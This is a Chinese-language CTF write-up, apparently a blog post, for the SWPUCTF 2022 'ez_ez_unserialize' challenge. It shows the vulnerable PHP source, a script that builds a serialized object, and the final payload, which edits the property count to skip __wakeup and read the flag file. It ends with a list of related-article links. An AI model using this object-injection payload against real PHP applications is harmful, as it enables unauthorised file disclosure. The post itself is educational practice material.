复健第二天之[SWPUCTF 2022 新生赛]ez_ez_unserialize

打开题目在线环境直接看到源码:

php 复制代码
<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

审计这些php代码,是反序列化,然后根据这个构造pop链:

php 复制代码
<?php

class X
{
    public $x = 'fllllllag.php';
}

$a = new X;
echo serialize($a);

?>

输出 的反序列化数据为:

*O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

这里绕过weakup,修改 "X" 后的 1(成员属性数量) 大于 1(实际数量) 即可。

最后再用GET或者POST 方法传参得到flag。

相关推荐
米羊12118 小时前
Linux 内核漏洞提权
网络·安全·web安全
运维行者_19 小时前
2026 技术升级,OpManager 新增 AI 网络拓扑与带宽预测功能
运维·网络·数据库·人工智能·安全·web安全·自动化
模型时代1 天前
StealC恶意软件控制面板安全漏洞暴露威胁行为者操作
安全·web安全·php
hzb666661 天前
basectf2024
开发语言·python·sql·学习·安全·web安全·php
运筹vivo@1 天前
BUUCTF: [SUCTF 2019]EasySQL
前端·web安全·php
独行soc1 天前
2026年渗透测试面试题总结-7(题目+回答)
java·网络·python·安全·web安全·渗透测试·安全狮
枫眠QAQ2 天前
hackthebox Editor靶机:从配置文件泄露密码到提权
安全·web安全·网络安全
十月南城2 天前
压测方法论——目标、场景、指标与容量评估的闭环
运维·web安全·ci/cd·微服务·云计算
吉吉612 天前
ThinkPHP5.0.15框架注入复现详细过程
web安全·php·安全性测试
一行注释2 天前
零宽字符Zero-Width Characters
web安全